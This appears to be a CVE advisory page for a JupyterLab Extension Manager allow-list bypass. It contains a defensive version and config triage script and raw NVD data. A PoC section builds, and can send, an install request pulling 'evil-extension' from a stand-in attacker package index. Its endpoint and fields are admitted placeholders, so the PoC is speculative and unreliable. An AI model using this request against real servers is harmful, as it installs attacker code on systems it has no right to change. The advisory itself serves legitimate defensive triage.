Security Vulnerability Report
CVE-2026-42266 CVSS 8.8 HIGH

CVE-2026-42266

Published: 2026-05-13 16:16:47
Last Modified: 2026-05-13 16:32:31

Description

JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook architecture. In versions 4.0.0 through 4.5.6, JupyterLab does not correctly enforce the allow-list of extensions that may be installed through the PyPI Extension Manager (allowed_extensions_uris), and the PyPI Extension Manager was not constrained to packages listed on the default PyPI index. An authenticated user with access to the Extension Manager could therefore have a package installed from a source the allow-list was meant to exclude; the record tags the weaknesses as CWE-88 (argument injection) and CWE-602 (client-side enforcement of server-side security), and the vector below reflects a low-privileged network attacker (PR:L) with high confidentiality, integrity and availability impact. This vulnerability is fixed in 4.5.7.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available yet (the record is still Awaiting Analysis). Per the description, the affected range is:

JupyterLab 4.0.0 (first affected version)
JupyterLab 4.5.6 (last affected version; fixed in 4.5.7)
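As a triage aid for this advisory, the following Python is added here and is not JupyterLab project code. It checks a version string against the affected range stated above (treating a pre-release of the fix version, such as 4.5.7rc1, as still affected) and reads a Jupyter-style {ClassName: {trait: value}} JSON config to decide whether the extension manager is actually in a position to install packages, since on an affected version setting allowed_extensions_uris is not an effective control. The trait names LabApp.extension_manager and LabServerApp.allowed_extensions_uris, the assumed default of "pypi", and the sample config values are assumptions to confirm against the JupyterLab version in use.

```python
"""Triage helper for CVE-2026-42266 (added example, not JupyterLab code).

Affected range per the advisory: 4.0.0 through 4.5.6, fixed in 4.5.7.
"""
import json
import re
from importlib import metadata
from typing import Optional

AFFECTED_MIN = "4.0.0"  # first affected release per the advisory
FIXED = "4.5.7"         # first fixed release per the advisory

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")
_PRERELEASE_RE = re.compile(r"^[.\-_]?(a|b|c|rc|alpha|beta|pre|dev)", re.IGNORECASE)


def version_key(version: str) -> tuple:
    """Sort key for PEP 440-style release strings.

    Only the numeric release segment and whether a pre-release suffix is
    present are considered; trailing zeros are dropped so "4.5" == "4.5.0".
    A pre-release sorts below its final release, so "4.5.7rc1" < "4.5.7",
    which is the conservative reading when the fix lands in the final release.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    is_final = 0 if _PRERELEASE_RE.match(m.group(2)) else 1
    return (tuple(parts), is_final)


def is_affected(version: str) -> bool:
    """True when version lies in [AFFECTED_MIN, FIXED)."""
    return version_key(AFFECTED_MIN) <= version_key(version) < version_key(FIXED)


def detect_local_version() -> Optional[str]:
    """Version of the jupyterlab distribution in this interpreter, if any."""
    try:
        return metadata.version("jupyterlab")
    except metadata.PackageNotFoundError:
        return None


def assess(version: str, config: Optional[dict] = None) -> dict:
    """Combine the version check with the server configuration.

    `config` mirrors the {ClassName: {trait: value}} shape of a Jupyter JSON
    config file. The trait names and the "pypi" default below are assumptions
    about the deployment (not taken from the advisory); adjust to your setup.
    """
    config = config or {}
    manager = config.get("LabApp", {}).get("extension_manager", "pypi")
    allow_list = config.get("LabServerApp", {}).get("allowed_extensions_uris", "")

    affected = is_affected(version)
    installs_enabled = manager not in ("readonly", "none", "", None)
    exposed = affected and installs_enabled

    findings = []
    if exposed:
        findings.append("extension manager can install packages on an affected version")
        if allow_list:
            findings.append("allowed_extensions_uris is configured but is not enforced on this version")
    elif affected:
        findings.append("affected version, but the extension manager is not installing packages")

    return {
        "version": version,
        "affected": affected,
        "exposed": exposed,
        "remediation": f"upgrade to {FIXED} or later" if affected else "none required",
        "findings": findings,
    }


if __name__ == "__main__":
    print("local jupyterlab:", detect_local_version() or "not installed")
    # Constructed sample deployments (no real hosts or files are consulted)
    samples = [
        ("4.2.5", {"LabServerApp": {"allowed_extensions_uris": "https://example.invalid/allowed.json"}}),
        ("4.2.5", {"LabApp": {"extension_manager": "readonly"}}),
        ("4.5.7rc1", {}),
        ("4.5.7", {}),
    ]
    for v, cfg in samples:
        print(json.dumps(assess(v, cfg)))
```

The version comparison is deliberately minimal (release segment plus a pre-release flag) so the script has no dependency on the packaging library; for fleets where post-releases or local version labels matter, swap version_key for packaging.version.Version.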

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC sketch for CVE-2026-42266: JupyterLab Extension Manager allow-list bypass.
# It builds the install request an attacker holding a low-privilege server
# token (the PR:L in the CVSS vector) would send to have a package installed
# from a source outside the allow-list. The endpoint and payload fields are
# placeholders: the advisory does not publish the request shape, so they must
# be adjusted to the real extension-manager API of the target version.
import json


def exploit(target_host, malicious_pkg_name, malicious_index_url, send=False):
    """Construct (and optionally send) the install request.

    Note: actual API endpoints and body fields vary with the JupyterLab version
    and configuration; nothing below is confirmed by the advisory.
    """
    # Placeholder endpoint for installing extensions
    install_url = f"{target_host}/api/extensions/install"

    # Headers with a low-privilege token (simulating PR:L)
    headers = {
        "Authorization": "token <low_privilege_token>",
        "Content-Type": "application/json",
    }

    # Payload attempting to install from a non-allow-listed source. The
    # 'index_url' field is the hypothesised parameter that would escape the
    # allowed_extensions_uris check; its real name is not known from the advisory.
    payload = {
        "name": malicious_pkg_name,
        "source": "pypi",
        "index_url": malicious_index_url,
    }

    print(f"[*] Attempting to install '{malicious_pkg_name}' from '{malicious_index_url}'...")
    print(f"[+] Request payload constructed: {json.dumps(payload)}")

    if not send:
        # Dry run: nothing leaves the host.
        print("[+] If vulnerable, the package would be installed from the malicious source.")
        return None

    import requests  # only needed for a live request

    try:
        response = requests.post(install_url, json=payload, headers=headers,
                                 timeout=10, verify=False)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None
    if response.status_code == 200:
        # An HTTP 200 only shows the server accepted the request; confirm the
        # install by listing extensions on the target afterwards.
        print("[+] Server accepted the install request (HTTP 200).")
    else:
        print(f"[-] Failed with status code: {response.status_code}")
    return response


if __name__ == "__main__":
    # Example usage (dry run; pass send=True to actually issue the request)
    TARGET = "http://vulnerable-jupyterlab:8888"
    PKG_NAME = "evil-extension"
    EVIL_INDEX = "http://attacker-controlled-malicious-repo.com/simple"
    exploit(TARGET, PKG_NAME, EVIL_INDEX)
```

References

https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-37w4-hwhx-4rc4 (vendor advisory, as listed in the record's references)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42266",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T16:16:47.017",
    "lastModified": "2026-05-13T16:32:31.457",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. From 4.0.0 to 4.5.6, the allow-list of extensions that can be installed from PyPI Extension Manager (allowed_extensions_uris) is not correctly enforced by JupyterLab. The PyPI Extension Manager was not contained to packages listed on the default PyPI index. This vulnerability is fixed in 4.5.7."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-88"},
          {"lang": "en", "value": "CWE-602"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-37w4-hwhx-4rc4",
        "source": "[email protected]"
      }
    ]
  }
}
```